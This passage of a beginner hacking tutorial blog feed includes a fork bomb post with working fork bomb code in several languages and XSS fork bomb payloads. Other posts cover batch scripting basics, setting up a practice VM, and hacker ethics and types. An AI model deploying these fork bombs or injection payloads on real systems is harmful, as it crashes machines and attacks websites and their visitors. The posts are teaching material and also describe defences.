goto s</code></pre><ul><li>Here, the first line creates a label <code>s</code>.</li><li><code>%0</code> actually refers to the name of the batch file itself. By <code>start %0</code> we&#x2019;re running the same file again.</li><li>And finally <code>goto s</code> brings us back to the top, forming a loop.</li></ul><p>So every time the loop is run another instance of the same program is started and then both of them run together and again duplicate themselves and so on.</p><figure class="kg-card kg-image-card"><img src="https://d33wubrfki0l68.cloudfront.net/a30a4baac88c3b45a9f85683e61fb03dd25a1e55/ac1b5/static/2f4c80a8f153be8c10d23a0b03966d49/b2a12/forkbomb.png" class="kg-image" alt="Fork Bomb, a Classic Attack" loading="lazy" title="fork bomb"></figure><p>Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs (21) are created. After another cycle, each of those two create another two for a total of four (22). After 10 iterations we have 1024 (210) instances of our little batch file. After 100 iterations we have 2100=<strong>1.267 nonillion</strong>, a number so big you don&#x2019;t even know what &#x2018;nonillion&#x2019; is (It&#x2019;s 1030).</p><p>The first instance will likely not even complete 50 iterations before the system grinds to a halt and crashes. For such a simple script, each individual iteration would hardly take a few milliseconds, so the first few iterations complete very quickly and soon it becomes more than what the computer can handle.</p><p>Is there a way to protect against fork bombs? Yup.</p><p>Any antivirus worth it&#x2019;s salt would be able to scan this suspicious executable file and warn the user before execution. As a fork bomb&#x2019;s mode of operation is entirely dependent on being able to create new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the <em>ulimit</em> utility; for example, the command <code>ulimit -u 30</code> would limit the affected user to a maximum of thirty owned processes.</p><p>And so we have our first little virus under our belt. Head over to<a href="https://leewardslope.digitalpress.blog/application-flooder"> the next one</a> to continue or scroll down if you&#x2019;re interested in checking out the code for fork bomb in other common languages.</p><ul><li>Bash</li></ul><pre><code class="language-shell-session">:(){ :|:&amp; };:</code></pre><ul><li>Python</li></ul><pre><code class="language-python">import os
while 1:
   os.fork()</code></pre><ul><li>Java</li></ul><pre><code class="language-java">public class ForkBomb
{
public static void main(String[] args)
{
  while(true)
  {
    Runtime.getRuntime().exec(new String[]{&quot;javaw&quot;, &quot;-cp&quot;, System.getProperty(&quot;java.class.path&quot;), &quot;ForkBomb&quot;});
  }
}
}</code></pre><ul><li>Ruby</li></ul><pre><code class="language-ruby">loop { fork { load(__FILE__) } }</code></pre><ul><li>C</li></ul><pre><code class="language-c">#include &lt;unistd.h&gt;

int main(void)
{
  while(1) {
    fork(); /* malloc can be used in order to increase the data usage */
  }
}</code></pre><ul><li>JavaScript</li></ul><pre><code class="language-javascript">while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}</code></pre><ul><li>The following version is easier for injection (XSS):</li></ul><pre><code class="language-shell-session">&lt;a href=&quot;#&quot; onload=&quot;function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }&quot;&gt;XSS fork bomb&lt;/a&gt;</code></pre><p>And the following is simply a more aggressive version of the above:</p><pre><code class="language-shellsession">&lt;script&gt;
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
&lt;/script&gt;</code></pre><p>And so we have our first little virus under our belt. Let&apos;s head over to <a href="https://leewardslope.comapplication-flooder/">the next one</a> to continue</p>]]></content:encoded></item><item><title><![CDATA[Introduction to Batch File Viruses]]></title><description><![CDATA[In the following few tutorials, we’ll be learning about batch file viruses. We’ll look at various techniques to bring down a computer using small and simple scripts.]]></description><link>https://leewardslope.digitalpress.blog/introduction-to-batch-file-viruses/</link><guid isPermaLink="false">5ff1c24c4ecdd80001033c6c</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Mon, 08 Mar 2021 03:01:05 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1515879218367-8466d910aaa4?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDEwfHxiYXRjaCUyMGZpbGUlMjBjb2RlfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1515879218367-8466d910aaa4?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDEwfHxiYXRjaCUyMGZpbGUlMjBjb2RlfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Introduction to Batch File Viruses"><p>In the following few tutorials, we&#x2019;ll be learning about batch file viruses. We&#x2019;ll look at various techniques to bring down a computer using small and simple scripts. Even if you have no background in programming, you&#x2019;ll find it very easy to follow along.</p><p>I recommend you use a virtual machine running a Windows OS if you want to follow along yourself. This is <strong>as much for safety as it is for convenience</strong>. This tutorial is pretty safe but from the next one we&#x2019;ll start building viruses. The first virus we&#x2019;ll look at will overload the computer&#x2019;s memory. That is, the computer will run out of RAM and likely freeze up and shut down. While this is unlikely to cause any lasting damage, using a virtual machine will still be more convenient simply because you won&#x2019;t have to keep restarting your computer because it crashed. Soon after this we will get to viruses that can do some very real and permanent damage to your system. You don&#x2019;t want to hack yourself, right? So you might as wel<a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">l earn how to setup a virtual machine for hacking practice before continuing</a>.</p><p>Now let us begin.</p><h2 id="what-are-batch-files">What are batch files?</h2><p>A <strong>batch file</strong>is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter. Batch files have the extension <code>.bat</code> (or<code>.cmd</code>). They can be easily created using any text editor such as notepad.</p><p>Now let&#x2019;s see some of these commands.</p><pre><code class="language-powershell">echo Hello World</code></pre><p>The <code>echo</code> command is used to print out a message, in this case &#x201C;Hello World&#x201D;. Type up the above in a text editor and save it as<code>something.bat</code>. Now open it and a command window pops up. But you&#x2019;ll notice that it closes before we get a chance to see what it outputs. Let&#x2019;s fix that.</p><pre><code class="language-cmd">echo Hello World
pause</code></pre><p>The<code>pause</code>command pauses the execution of the batch file until a user presses a key. You should now see the following output:</p><pre><code class="language-powershell">C:\Users\Akhil\Desktop&gt;echo Hello World
Hello World
C:\Users\Akhil\Desktop&gt;pause
Press any key to continue . . .</code></pre><p><code>C:\Users\Akhil\Desktop&gt;</code> is where the execution is happening. In my case, I&#x2019;ve saved the batch file on the desktop. The batch file seems to be printing the commands before executing them. It first prints <code>echo Hello World</code> then actually executes it to output <code>Hello World</code>. Let&#x2019;s see if we can clean this up a bit.</p><pre><code class="language-powershell">@echo off
echo Hello World
pause</code></pre><p>And this outputs&#x2026;</p><pre><code class="language-powershell">Hello World
Press any key to continue . . .</code></pre><p>Much better.<code>@echo off</code> is used to stop the commands from being printed and leaves only the output of those commands. Now let&#x2019;s add a little dynamic behavior.</p><pre><code class="language-powershell">@echo off
set a=Akhil
echo Hello %a%
pause</code></pre><p>The<code>set</code>command is used to define <strong>variables</strong> that can hold different values, in this case the string &#x201C;Akhil&#x201D;. The variable name enclosed within <code>%%</code> is how we access the value stored in the variable. Run the above and you should see</p><pre><code class="language-powershell">Hello Akhil
Press any key to continue . . .</code></pre><p>Be careful here, the set command is pretty sensitive about the use of spaces:</p><ul><li><code>set a=Akhil</code> means<code>a</code>has the value &#x2018;Akhil&#x2019;</li><li><code>set a= Akhil</code> (with a space after the<code>=</code>) means &#x2018;a&#x2019; has the value &#x2018; Akhil&#x2019; (with a space before it) and</li><li><code>set a =Akhil</code> with a space before<code>=</code>) means that the variable is not defined as<code>a</code>but as<code>a</code>(&#x2018;a&#x2019; followed by a space).</li></ul><p>Some commands come with modifiers that slightly alter their behavior:</p><pre><code class="language-powershell">@echo off
set /a a=5
set /a b=10
set /a c=%a% + %b%
echo %c%
pause</code></pre><p>In <code>set /a</code>, the<code>/a</code>part is telling <code>set</code> that it should treat the value of the variable as a number, allowing us to perform mathematical operations on it.</p><pre><code class="language-powershell">@echo off
set /p a=Enter your name: 
echo Hello %a%
pause</code></pre><p>The <code>/p</code> modifier tells the <code>set</code> command that it should take in some input from the user and store that in the variable <code>a</code>. When you run the batch file, you will be prompted to enter something. The output looks like:</p><pre><code class="language-powershell">Enter your name: Emily
Hello Emily
Press any key to continue . . .</code></pre><h2 id="examples-of-batch-files">Examples of Batch Files</h2><p>That was pretty easy, now let&#x2019;s take a look at a couple more batch files that might actually be useful and then we&#x2019;ll go and make some viruses.</p><h3 id="pinger">Pinger</h3><pre><code class="language-powershell">@echo off
title Pinger
set /p target=Enter IP address or URL: 
ping %target% -t
pause</code></pre><p>This outputs:</p><pre><code class="language-powershell">Enter IP address or URL: google.com
Pinging google.com [216.58.220.206] with 32 bytes of data:
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=27ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57</code></pre><p>Pretty handy if you want to quickly ping an IP address/URL or check your internet connection.</p><p><em>P.S: Pressing CTRL+C forcefully stops any running command (like <code>ping -t</code> which likes to run forever).</em></p><h3 id="shutdown-timer">Shutdown timer</h3><p>The batch file schedules a shutdown after X minutes.</p><pre><code class="language-powershell">@echo off
title Shutdown Input
set /p mins=Enter number of minutes to wait until shutdown:
set /a mins=%mins%*60
shutdown -s -t %mins%</code></pre><hr><p>This was but a glimpse of what batch files can do. Almost anything your operating system does for you can be done through batch files. You can even use them to automate repetitive and boring tasks. The limit is only your imagination.</p><p>One of these imaginative uses is creating batch file viruses and that is just what we&#x2019;re going to learn now. Let&#x2019;s start with the famous <a href="https://leewardslope.digitalpress.blog/fork-bomb">fork bomb</a>.</p>]]></content:encoded></item><item><title><![CDATA[Setting up a Virtual Machine to practice Hacking.]]></title><description><![CDATA[Now that we’ve got the introduction to hacking out of the way, there’s just one last thing left before we can actually start hacking.]]></description><link>https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking/</link><guid isPermaLink="false">5fe5924e1c6d0b0001c5aa60</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Fri, 25 Dec 2020 10:03:11 GMT</pubDate><media:content url="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/setting-up-a-vm.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/setting-up-a-vm.jpg" alt="Setting up a Virtual Machine to practice Hacking."><p>Now that we&#x2019;ve got the <a href="https://leewardslope.digitalpress.blog/what-is-hacking">introduction to hacking</a> out of the way, there&#x2019;s just one last thing left before we can actually start hacking.</p><p>Due to the *ahem* <em>sensitive</em> nature of our field of work, I recommend you use a virtual machine and not your personal native OS for doing anything you&#x2019;re not familiar with. Virtual machines are perfect for practicing hacking:</p><ul><li>You can do whatever you want inside a VM and just hit <strong>reset </strong>and you&#x2019;re back to a working OS</li><li>You can blow it up however you want, see what happens when you delete important stuff and do unspeakable things to it with <strong>zero risk of damaging your actual system</strong>.</li><li>It&#x2019;s <strong>cross-platform</strong>. Are you on Windows? Mac? Linux? Doesn&#x2019;t matter. You can run all of these <em>inside </em>each other.</li><li>It&#x2019;s <strong>free</strong>. <em>Officially free</em>, that is, no need to pirate or download from shady sources. (At least for Windows and Linux)</li></ul><p>In the following few tutorials, we&#x2019;ll need to use Windows. So here we&#x2019;re going to see how to setup a Windows Virtual Machine. Eventually we&#x2019;ll move on to using <a href="https://leewardslope.digitalpress.blog/installing-kali">Kali Linux</a> for more advanced hacking.</p><p>Now, let&#x2019;s get to it.</p><h3 id="step-1">Step 1</h3><p>For creating a virtual machine we need two things: the virtualization software and the OS image file.</p><ul><li><strong>The Virtualization Software</strong>: I recommend <a href="https://www.virtualbox.org/">VirtualBox</a>. It&#x2019;s free and cross platform.</li><li><strong>The OS Image</strong>: You can find a bunch of Windows OS images <a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/">here</a>.</li></ul><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1517" height="1176"></figure><ul><li>Microsoft is currently offering Windows 7 through 10, pick whichever you want. I picked <strong>Windows 10 Stable</strong>.</li><li>Make sure to select the right platform. For us that&#x2019;s <strong>VirtualBox</strong>.</li><li>Click the <strong>download</strong> button (it&#x2019;s about 4 GB).</li></ul><p>If you encounter any issues, you can <strong>view installation instructions.</strong></p><p>These OS images that Microsoft is offering are meant for testing and not normal usage. It&#x2019;s validity is 90 days after which we&#x2019;ll have to reset the virtual machine back to keep using it. To do this, we&#x2019;ll take a snapshot of the initial state. Using a snapshot is also an easy way to reset the virtual machine back to a working state should something bad happen, which it will because we&#x2019;re here to practice hacking.</p><p>After the download is complete, you should have a zip file that contains <code>MSEdge - Win10_preview.ova</code>. This is our image file. Now we need to load it up into VirtualBox.</p><h3 id="step-2">Step 2</h3><p>Extract the <code>.ova</code> file somewhere and start VirtualBox. Click <code>File -&gt; Import Appliance</code>.</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-1.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1343" height="854"></figure><h3 id="step-3">Step 3</h3><p>Now find your <code>.ova</code> file and click <code>Next</code>.</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-2.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1339" height="854"></figure><h3 id="step-4">Step 4</h3><p>Click <code>Import</code>.</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-3.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1339" height="855"></figure><h3 id="step-5">Step 5</h3><p>And now your virtual machine is setup, you should see something like this:</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-4.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1878" height="1064"></figure><h3 id="step-6">Step 6</h3><p>Just a couple more things and then we can fire it up. Go to <code>Settings</code>, then the <code>Display</code> tab and increase the video memory to <code>128 MB</code>. This will allow you to use the virtual machine in full screen and make it a bit more responsive.</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-5.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1878" height="1056"></figure><h3 id="step-7">Step 7</h3><p>Click <code>Snapshot</code> in the upper right corner and then the <code>camera</code> button to create a snapshot. (Ideally, you should do this before starting the virtual machine for the first time)</p><h3 id="step-8">Step 8</h3><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-6.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1878" height="1043"></figure><h3 id="step-9">Step 9</h3><p>And that&#x2019;s it. Hit <code>Start</code> and our virtual machine is ready to handle all the abuse we&#x2019;re about to throw at it. If When something goes wrong, simply restore the snapshot and it&#x2019;ll work again.</p><figure class="kg-card kg-image-card"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/image-7.png" class="kg-image" alt="Setting up a Virtual Machine to practice Hacking." loading="lazy" width="1878" height="1060"></figure><p>Now you&#x2019;re ready totest a variety of hacking techniques while keeping your own system safe. The virtual machine effectively acts as a sandbox, protecting you from yourself. In a future tutorial, we&#x2019;ll expand upon this by setting up networking with virtual machines, which allows you to do even more such as practicing hacking webcams or penetration testing firewalls or setting up man-in-the-middle attacks and so on.</p><p>We have a long and very interesting road ahead of us. But for now, we&#x2019;re going to start off with something small and powerful. Say hello to <a href="https://leewardslope.digitalpress.blog/introduction-to-batch-file-viruses">batch file viruses</a>.</p>]]></content:encoded></item><item><title><![CDATA[Not being a Noob]]></title><description><![CDATA[Now that we have a basic grasp on ethical hacking, we need to address something before we proceed further. The following article assumes that you are a complete beginner]]></description><link>https://leewardslope.digitalpress.blog/not-being-a-noob/</link><guid isPermaLink="false">5fe0207a3faad9000142427e</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Wed, 23 Dec 2020 02:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1522211988038-6fcbb8c12c7e?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDZ8fGxpYnJhcnklMjB3aXRoJTIwYSUyMG1hbnxlbnwwfHx8&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1522211988038-6fcbb8c12c7e?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDZ8fGxpYnJhcnklMjB3aXRoJTIwYSUyMG1hbnxlbnwwfHx8&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Not being a Noob"><p>Now that we have a <a href="https://leewardslope.digitalpress.blog/more-on-hacking">basic grasp on ethical hacking</a>, we need to address something before we proceed further. The following article assumes that you are a complete beginner and will likely help you every step of the way in becoming a hacker. This article is for anyone who wishes to communicate their troubles efficiently and getting their questions answered without uncalled-for rudeness. If you are a programmer or have other considerable technical experience, feel free to skip this one.</p><p>The purpose of this course is to teach you hacking, but hacking is really something that can only be self-taught. If you are indeed serious about hacking, you will first have to <em>learn how to learn</em>.</p><h3 id="where-to-ask-for-help-with-hacking">Where to ask for help with hacking?</h3><p>When learning something new, you are going to run into problems. Everyone does, it&#x2019;s all a part of the journey. You&#x2019;ll find that there are plenty of online communities where you can go and ask questions and just find help with something. A couple of those are:</p><ul><li><a href="https://security.stackexchange.com/">Information Security Stack Exchange</a></li><li>Reddit: <a href="https://www.reddit.com/r/hacking/">/r/Hacking</a>, <a href="https://www.reddit.com/r/HowToHack/">/r/HowToHack</a>, <a href="https://www.reddit.com/r/netsec/">/r/netsec</a></li></ul><p>And of course, there&#x2019;s a community of ethical hackers and <a href="https://hackers.leewardslope.com/@akhil">me on leeward Hackers</a> always happy to help with any queries you may have.</p><h3 id="how-to-ask-for-help">How to ask for help?</h3><ul><li>&#x201C;Just Google it!&#x201D;</li><li>&#x201C;Please read the rules and code of conduct before posting&#x201D;</li><li>&#x201C;If you can&#x2019;t do it, doesn&#x2019;t mean it doesn&#x2019;t work.&#x201D;</li></ul><p>These are just some of the replies I frequently come across on various blogs, forums and comment threads around the internet. As a beginner, you need to understand that when you&#x2019;re asking someone for help, you&#x2019;re asking a stranger to take time out of their day and devote it to you, another stranger. <strong>It is your responsibility to prove that you are worth helping.</strong></p><p>So many online communities are full of friendly people willing to help beginners get up to speed. And yet, noobs are still everywhere:</p><ul><li>&#x201C;Fake.. Doesn&#x2019;t work.&#x201D;</li><li>&#x201C;I tried but wasn&#x2019;t able to do <code>this thing</code>.. how do I do <code>this thing</code>?&#x201D;</li><li>&#x201C;How to hack FB easily?&#x201D;</li><li>&#x201C;Need hacking tool for this online game..&#x201D;</li></ul><p>You can see why these sorts of half-assed attempts at trying to get someone else to do your work are often ignored and even ridiculed. And in hacking, what these &#x2018;noobs&#x2019; are usually trying to do is most likely selfish, unethical and even illegal. <strong>You are not going to find help like this.</strong></p><p>On the internet, you come across all sorts of people from all walks of life. Most people at one point or another, encounter someone who instead of answering or just ignoring a sincere question or request, chooses to be rude and mocks the person asking the question.</p><p>Why does this happen? Why do we still see so many pointless conversations? Why so many questions that have been asked and answered a million times still seem to stagger some? How to get out of this vicious cycle? How to avoid coming across as a noob and how to help others who are in fact not so different than us? It&#x2019;s time someone answered these questions. So, here&#x2019;s my attempt.</p><p>Admittedly, this may seem a bit general but <strong>not being a noob</strong>(or at least not looking like one) holds great importance specially for beginner hackers. This is because the only way to get help is from someone who has experience in this field. It isn&#x2019;t hard to understand the lack of patience when it comes dealing with people who are just looking for shortcuts instead of trying to learn and contribute something.</p><p>When you ask for help online, it&#x2019;s important to do so in a way that&#x2019;s mindful of the readers time. Not only does this make it more likely that you&#x2019;ll receive a helpful reply but it also helps other people with the same query who may find your page in the future. This is how you ask a question:</p><ul><li><strong>Google before asking. </strong>Why waste your own and others time when a question has already been answered elsewhere? Google your question before posting it in a forum or community.</li><li><strong>Use proper grammar. </strong>If people can&#x2019;t understand you, they can&#x2019;t answer your questions. If English isn&#x2019;t very good, then you really should learn English first as the majority of content on the internet (including hacking tutorials) is in English.</li><li><strong>Clearly state the problem. </strong>Mention what you are trying to do and why you cannot seem to do so.</li><li><strong>What all have you tried? </strong>Tell the readers what all solutions you found on Google and that none of them solved your problem which is why you&#x2019;re asking for help.</li><li><strong>Tell us your specs</strong>. Don&#x2019;t leave out any important information that a reader may need to answer your question. Mention all the relevant details such as your operating system, version of software etc.</li></ul><p>So long as you do this, you will receive polite and helpful answers to all your questions and you will be making the internet a better place for everyone.</p><p>A couple of points deserve to be explained further. These are some common red flags that signal that the person asking a question has only selfish interest in mind not learning.</p><h3 id="asking-google-able-questions">Asking Google-able Questions</h3><p>Yes, this again. There&#x2019;s an awful lot of people on our little planet. Say you want to go out to congratulate everyone who has a birthday today and take 10 seconds per person. Assuming a conservative average of 20 million birthdays a day, it will take you over 6 years, if you went 24 hours a day, everyday. By that time, of course the last person would have aged 6 years and would not be very happy with you. What&#x2019;s the point of telling you this? Not only that statistics are fun but more importantly: <strong>There&#x2019;s an awful lot of people in the world</strong>.</p><p>With this in mind, there&#x2019;s a very good chance that when you face a problem, somewhere someone else has already faced and overcome the same problem in the past. The answers are right there on the internet, waiting to be googled.</p><p>Further, Google has a ridiculously large webpage index (<a href="http://venturebeat.com/2013/03/01/how-google-searches-30-trillion-web-pages-100-billion-times-a-month/">over 30 trillion</a> freaking pages). Say you type something in the Google search bar, notice that it comes up with numerous suggestions, millions of pages most of the time. That means someone has probably typed that before. It&#x2019;s like almost everything we&#x2019;ll ever think, has already been thought of by someone else. Consequently, majority of what we&#x2019;ll ever search on Google has already been searched by someone else and there&#x2019;s a good chance that your problem has already been solved.</p><p>So before doing anything else, you should always Google for a solution to whatever problem you are facing. Not only is this much quicker for you, but it saves others time as well. <strong>Life is short. Learn to Google.</strong></p><h3 id="asking-unethical-questions">Asking unethical questions</h3><p>This is a big issue in hacking. If your only goal is to hack your ex-girlfriend&#x2019;s Facebook account or steal your neighbor&#x2019;s Wi-Fi (all the while without having the slightest inclination towards educating yourself), while strangers on the internet cannot stop you from trying to do such things, they are almost certainly not going to help you.</p><p>I started this website ~4 years ago, in that time I have received literally tens of thousands of request to hack someone&#x2019;s Facebook account. I haven&#x2019;t replied to a single such request and I don&#x2019;t plan on ever doing so. To an expert hacker, when someone asks a question, their intentions are immediately clear. Noobs are not fooling anyone.</p><p><strong>Your morality is up to you</strong> but do not expect others to help realize your petty ambitions.</p><h3 id="expecting-too-much">Expecting too much</h3><p>Hacking is not magic. When a problem presents itself, a hacker should break it down into logical steps and find a solution. Movies have engraved in the minds of na&#xEF;ve viewers that expert hackers are practically magicians. According to movies, an expert hacker might as well be typing any nonsense on his/her keyboard (while blindfolded) and the greatest glories and accomplishments can be achieved. Entire nations can be supposedly hacked, gazillions of dollars await hackers just a few keystrokes away and what not. According to movies, tomorrow we may even see evil hackers burning our morning toasts and remotely hacking into our mobile phones and programming them to grow wings and fly off. <strong>No.</strong> Please stop.</p><p>To the astonishment of noobs, there is no top-secret program that can suddenly turn them into an expert. When performing any hacking technique, there are a set of steps one must carry out methodically to attempt to hack something. Further, the majority of the tools used are actually free, in fact most are open-source. Remember Google-able questions? This is one of them.</p><p>When a person asks a question about which they have little to no knowledge, it is obviously going to drive away potential respondents. What the person needs to understand is that the respondent is doing them a favor. Nobody is going to sit down and happily write a custom spoon-fed tutorial, so that the person can then mindlessly follow it and obtain something they clearly do not deserve. Everyone&#x2019;s time is valuable and if the person is asking a total stranger for an unreasonably big chunk, they are going to be ignored.</p><hr><p>The world will always be moving fast and it is up to us to keep up. Humanity&#x2019;s collective intelligence will always surpass any individual&#x2019;s intelligence. It is for this reason, hackers, more than any other groups, should learn to learn from and teach others, peacefully. Exchange of information and ideas are the pillars keeping the hacker community alive, bonded and continually rising to greater heights.</p><p>So that&#x2019;s that and now we&#x2019;re finally ready to begin learning hacking. Let&#x2019;s start by creating <a href="https://leewardslope.digitalpress.blog/introduction-to-batch-file-viruses">our very own viruses</a>.</p>]]></content:encoded></item><item><title><![CDATA[More on Hacking]]></title><description><![CDATA[In computer networking, hacking is any technical effort to manipulate the normal behaviour of network connections and connected systems. A hacker is any person engaged in hacking.]]></description><link>https://leewardslope.digitalpress.blog/more-on-hacking/</link><guid isPermaLink="false">5fe01f643faad90001424275</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Tue, 22 Dec 2020 04:15:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1554774853-b3d587d95440?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDYxfHxoYWNraW5nfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<h3 id="who-is-a-hacker">Who is a Hacker?</h3><img src="https://images.unsplash.com/photo-1554774853-b3d587d95440?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDYxfHxoYWNraW5nfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="More on Hacking"><p>In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term &#x201C;hacking&#x201D; historically referred to constructive, clever technical work that was not necessarily related to computer systems.</p><p>Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks.</p><h3 id="origins-of-hacking-">Origins of Hacking:</h3><p>M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called &#x201C;hacks&#x201D; perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities. Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify telephones for making free long-distance calls over the phone network illegally.</p><p>As computer networking and the Internet exploded in popularity, data networks became by far the most common target of hackers and hacking.</p><h3 id="hacking-vs-cracking">Hacking vs. Cracking</h3><p>Malicious attacks on computer networks are officially known as cracking, while hacking truly applies only to activities having good intentions. Most non-technical people fail to make this distinction, however. Outside of academia, its extremely common to see the term &#x201C;hack&#x201D; misused and be applied to cracks as well.</p><h3 id="common-network-hacking-techniques">Common Network Hacking Techniques</h3><p>Hacking on computer networks is often done through scripts or other network programming. These programs generally manipulate data passing through a network connection in ways designed to obtain more information about how the target system works. Many such pre-packaged scripts are posted on the Internet for anyone, typically entry-level hackers, to use.</p><p>More advanced hackers may study and modify these scripts to develop new methods. A few highly skilled hackers work for commercial firms with the job to protect that company&#x2019;s software and data from outside hacking. Cracking techniques on networks include creating worms, initiating denial of service (DoS) attacks, or in establishing unauthorized remote access connections to a device.</p>]]></content:encoded></item><item><title><![CDATA[Types of Hackers]]></title><description><![CDATA[So we know what hacking is, now let’s talk about hackers. There are a lot of things that distinguish different kinds of hackers. Most importantly, skill and motivations.]]></description><link>https://leewardslope.digitalpress.blog/types-of-hackers/</link><guid isPermaLink="false">5fe00d5ff89ec0000198bd3d</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Mon, 21 Dec 2020 02:55:02 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1504384764586-bb4cdc1707b0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDE0MHx8aGFja2Vyc3xlbnwwfHx8&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1504384764586-bb4cdc1707b0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDE0MHx8aGFja2Vyc3xlbnwwfHx8&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Types of Hackers"><p>So we know <a href="https://blog.leewardslope.com/what-is-hacking">what hacking is</a>, now let&#x2019;s talk about hackers. There are a lot of things that distinguish different kinds of hackers. Most importantly, skill and motivations. That is, <strong>what are you trying to accomplish and how far are you willing to go?</strong> This is the question I want you, the reader, to ask yourself at the end of this article.</p><h3 id="script-kiddie">Script Kiddie</h3><p>Script kiddies, in a word, are noobs. People who want to hack for shortsighted selfish reasons without having any inclination to actually learn something. These are the people who&#x2019;d rather spend their time looking for some secret tricks that they think real hackers use. They may figure out how to use tools and scripts made by others but they can neither make their own tools nor do anything that involves a task more complex than copy-pasting. A script kiddie is that one annoying kid in class who pisses off everyone else. Don&#x2019;t be that guy.</p><h3 id="black-hat">Black hat</h3><p>Black hat hackers are the bad guys. They are cyber criminals with malicious intents who&#x2019;s only goal is personal gain or sabotage. They are digital thieves money, they steal credit card information, valuable data and identities. They infect systems with viruses, 